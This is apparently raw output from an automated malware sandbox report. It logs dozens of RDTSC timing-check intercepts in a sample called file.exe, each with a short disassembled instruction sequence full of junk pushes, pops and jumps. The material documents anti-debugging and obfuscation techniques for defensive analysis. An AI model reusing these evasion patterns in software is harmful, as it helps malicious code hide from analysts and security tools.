    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C821D3 second address: C821D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C821D7 second address: C82216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 588CA7E0h 0x0000000f mov si, BBCAh 0x00000013 push 00000003h 0x00000015 mov ecx, 4AF829A0h 0x0000001a push 00000000h 0x0000001c mov esi, dword ptr [ebp+122D2D1Ah] 0x00000022 push 00000003h 0x00000024 mov dword ptr [ebp+122D1F93h], eax 0x0000002a mov ecx, dword ptr [ebp+122D2E5Eh] 0x00000030 push B72E3467h 0x00000035 jc 00007F72B9AA7994h 0x0000003b push eax 0x0000003c push edx 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82216 second address: C8221A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8221A second address: C82253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 772E3467h 0x0000000d mov dl, EAh 0x0000000f lea ebx, dword ptr [ebp+12451FCFh] 0x00000015 pushad 0x00000016 mov ecx, dword ptr [ebp+122D1F93h] 0x0000001c mov ax, 5065h 0x00000020 popad 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F72B9AA7990h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C822D1 second address: C822D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C822D7 second address: C82304 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72B9AA798Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F72B9AA799Ah 0x00000013 jmp 00007F72B9AA7994h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7238F second address: C7239D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jnl 00007F72B8E40BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1276 second address: CA1298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B9AA7990h 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007F72B9AA7986h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1298 second address: CA129C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA129C second address: CA12A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA140D second address: CA1411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1411 second address: CA1431 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F72B9AA7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F72B9AA7996h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1431 second address: CA143B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F72B8E40BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA143B second address: CA143F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C7A second address: CA1C84 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F72B8E40BFEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1C84 second address: CA1CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F72B9AA798Eh 0x00000010 jbe 00007F72B9AA7986h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1CA5 second address: CA1CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1CAA second address: CA1CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F72B9AA7986h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA1E2F second address: CA1E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jns 00007F72B8E40BF6h 0x0000000c pop eax 0x0000000d jo 00007F72B8E40BFEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2120 second address: CA2126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2126 second address: CA2131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2131 second address: CA2146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F72B9AA7986h 0x0000000a jnc 00007F72B9AA7986h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99AF0 second address: C99B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40BFDh 0x00000007 jmp 00007F72B8E40C05h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 jo 00007F72B8E40BF6h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99B26 second address: C99B30 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72B9AA7986h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99B30 second address: C99B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99B36 second address: C99B3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2B6B second address: CA2B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2B6F second address: CA2B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F72B9AA7992h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2B96 second address: CA2B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2B9A second address: CA2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2CF4 second address: CA2D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B8E40C09h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2D11 second address: CA2D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2D15 second address: CA2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F72B8E40C05h 0x0000000d jc 00007F72B8E40C02h 0x00000013 jmp 00007F72B8E40BFCh 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2D47 second address: CA2D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2FF7 second address: CA2FFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA2FFB second address: CA300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007F72B9AA7986h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AA3 second address: CA5AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AAA second address: CA5AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AB0 second address: CA5AC5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F72B8E40BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AC5 second address: CA5ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5ACC second address: CA5AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F72B8E40BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AD6 second address: CA5ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5ADA second address: CA5AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AEC second address: CA5AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5AF2 second address: CA5AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA5D51 second address: CA5D5B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F72B9AA7986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8927 second address: CA8939 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B8E40BFDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8939 second address: CA8945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8945 second address: CA895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F72B8E40C02h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACC7A second address: CACC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACC80 second address: CACC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACC84 second address: CACCA1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F72B9AA7986h 0x00000008 jmp 00007F72B9AA7990h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACCA1 second address: CACCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACCAC second address: CACCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACF9C second address: CACFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACFA2 second address: CACFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F72B9AA798Dh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD609 second address: CAD60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD60D second address: CAD611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAD611 second address: CAD61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0AD8 second address: CB0B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 popad 0x0000000a add dword ptr [esp], 516EC573h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F72B9AA7988h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007F72B9AA7991h 0x00000030 push C0D83F83h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F72B9AA7995h 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0E44 second address: CB0E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB0FED second address: CB1005 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F72B9AA798Bh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1005 second address: CB100F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F72B8E40BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB17A4 second address: CB17A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB17A8 second address: CB17D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B8E40C03h 0x00000008 jl 00007F72B8E40BF6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F72B8E40BFCh 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB17D6 second address: CB17ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72B9AA7993h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB18C3 second address: CB18D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F72B8E40BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F72B8E40BF6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1978 second address: CB197C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C758BB second address: C758CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F72B8E40BF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C758CA second address: C758CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C758CE second address: C758D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C758D4 second address: C75924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F72B9AA79A8h 0x0000000c popad 0x0000000d jl 00007F72B9AA79BCh 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007F72B9AA7992h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3886 second address: CB3890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F72B8E40BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB52BE second address: CB5354 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F72B9AA798Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2D72h] 0x00000011 push 00000000h 0x00000013 sub esi, dword ptr [ebp+122D2DCEh] 0x00000019 call 00007F72B9AA7998h 0x0000001e jmp 00007F72B9AA798Ch 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F72B9AA7988h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov dword ptr [ebp+12453058h], eax 0x00000046 pushad 0x00000047 jmp 00007F72B9AA7990h 0x0000004c cld 0x0000004d popad 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007F72B9AA798Bh 0x00000057 ja 00007F72B9AA7986h 0x0000005d popad 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5354 second address: CB5387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F72B8E40C09h 0x00000008 jc 00007F72B8E40BF6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jne 00007F72B8E40BF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5387 second address: CB538B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5CB5 second address: CB5CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5CBB second address: CB5CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5CC4 second address: CB5CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB67EF second address: CB6806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72B9AA7993h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7291 second address: CB7309 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F72B8E40BF8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F72B8E40BF8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f call 00007F72B8E40C02h 0x00000044 mov di, 9FC4h 0x00000048 pop edi 0x00000049 push 00000000h 0x0000004b push ecx 0x0000004c jne 00007F72B8E40BFCh 0x00000052 pop edi 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jl 00007F72B8E40BF8h 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7309 second address: CB7313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F72B9AA7986h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7D1D second address: CB7D27 instructions: 0x00000000 rdtsc 0x00000002 js 00007F72B8E40BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA417 second address: CBA41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA41B second address: CBA41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC74C second address: CBC750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCCCE second address: CBCCDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F72B8E40BF6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCE19 second address: CBCE1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDF0D second address: CBDF17 instructions: 0x00000000 rdtsc 0x00000002 je 00007F72B8E40BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDF17 second address: CBDF1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
